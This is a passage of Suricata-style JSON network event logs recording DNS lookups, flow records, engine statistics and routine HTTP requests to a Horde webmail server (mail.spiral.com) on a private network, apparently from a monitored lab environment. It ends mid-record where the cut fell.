{"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} {"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:11:40.136642+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19706,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:40.356634+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018}} {"timestamp":"2020-02-29T00:11:41.000189+0000","event_type":"stats","stats":{"uptime":14353,"capture":{"kernel_packets":134731,"kernel_drops":0},"decoder":{"pkts":134769,"bytes":92953515,"invalid":185,"ipv4":133284,"ipv6":8,"ethernet":134769,"raw":0,"null":0,"sll":0,"tcp":128038,"udp":5046,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2750,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2766,"synack":2757,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1791,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2304,"failed_udp":111},"tx":{"http":4609,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2383}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2352,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22816,"memcap_state":0,"memcap_global":0},"http":{"memuse":200557,"memcap":0}}} {"timestamp":"2020-02-29T00:11:42.000260+0000","flow_id":157748428880946,"event_type":"flow","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:06:41.867378+0000","end":"2020-02-29T00:06:41.975863+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:42.767232+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17983,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:42.798805+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/newwin.png","state":"CLOSED","stored":false,"size":316,"tx_id":6}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:42.875378+0000","flow_id":921415108703488,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59394,"proto":"UDP","dns":{"type":"answer","id":17983,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:42.947886+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710}} {"timestamp":"2020-02-29T00:11:43.000367+0000","flow_id":446408885986074,"event_type":"flow","src_ip":"192.168.10.122","src_port":43798,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:42.582426+0000","end":"2020-02-29T00:06:42.690395+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:43.012531+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6710},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":23757,"tx_id":7}} {"timestamp":"2020-02-29T00:11:43.014870+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} {"timestamp":"2020-02-29T00:11:43.015159+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833}} {"timestamp":"2020-02-29T00:11:43.017305+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622}} {"timestamp":"2020-02-29T00:11:43.047974+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/message-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2622},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/message-dimp.js","state":"CLOSED","stored":false,"size":10354,"tx_id":8}} {"timestamp":"2020-02-29T00:11:43.048269+0000","flow_id":1202052566297535,"event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.053234+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/textarearesize.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":833},"app_proto":"http","fileinfo":{"filename":"\/js\/textarearesize.js","state":"CLOSED","stored":false,"size":2039,"tx_id":5}} {"timestamp":"2020-02-29T00:11:43.053530+0000","flow_id":150206485572827,"event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:11:43.160141+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:11:44.693232+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":1396,"tx_id":2}} {"timestamp":"2020-02-29T00:11:44.702093+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34802,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":0}} {"timestamp":"2020-02-29T00:11:45.000458+0000","flow_id":760048888043704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":12,"bytes_toserver":2742,"bytes_toclient":7539,"start":"2020-02-29T00:10:35.055480+0000","end":"2020-02-29T00:10:44.624902+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:11:45.362391+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34804,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":22784,"tx_id":0}} {"timestamp":"2020-02-29T00:11:48.000224+0000","event_type":"stats","stats":{"uptime":14360,"capture":{"kernel_packets":134854,"kernel_drops":0},"decoder":{"pkts":134874,"bytes":92994340,"invalid":185,"ipv4":133387,"ipv6":8,"ethernet":134874,"raw":0,"null":0,"sll":0,"tcp":128131,"udp":5056,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2753,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2769,"synack":2760,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1794,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2309,"failed_udp":111},"tx":{"http":4621,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2388}},"flow_mgr":{"closed_pruned":2728,"new_pruned":15,"est_pruned":2354,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22485,"memcap_state":0,"memcap_global":0},"http":{"memuse":72030,"memcap":0}}} {"timestamp":"2020-02-29T00:11:48.160966+0000","flow_id":1491464643110889,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/message_source.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/message_source.png","state":"CLOSED","stored":false,"size":119,"tx_id":0}} {"timestamp":"2020-02-29T00:11:48.199209+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:48.307119+0000","flow_id":223250995218985,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58990,"proto":"UDP","dns":{"type":"answer","id":32212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:48.379377+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":78,"tx_id":0}} {"timestamp":"2020-02-29T00:11:49.000760+0000","flow_id":1668915492608187,"event_type":"flow","src_ip":"192.168.10.122","src_port":58818,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:48.579771+0000","end":"2020-02-29T00:06:48.688271+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:52.834518+0000","flow_id":299443715105269,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52730,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/getReplyData","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=message&buid=2&mailbox=SU5CT1g&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582935102499","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/getReplyData","state":"CLOSED","stored":false,"size":735,"tx_id":0}} {"timestamp":"2020-02-29T00:11:52.846418+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40980,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43778,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:52.954641+0000","flow_id":447486943095378,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40980,"proto":"UDP","dns":{"type":"answer","id":43778,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:54.000928+0000","flow_id":397725432354945,"event_type":"flow","src_ip":"192.168.10.122","src_port":45988,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:06:53.530561+0000","end":"2020-02-29T00:06:53.639563+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:55.000261+0000","event_type":"stats","stats":{"uptime":14367,"capture":{"kernel_packets":134889,"kernel_drops":0},"decoder":{"pkts":134892,"bytes":92999998,"invalid":186,"ipv4":133405,"ipv6":8,"ethernet":134892,"raw":0,"null":0,"sll":0,"tcp":128144,"udp":5060,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2754,"ssn_memcap_drop":0,"pseudo":346,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2770,"synack":2761,"rst":1205,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1795,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tc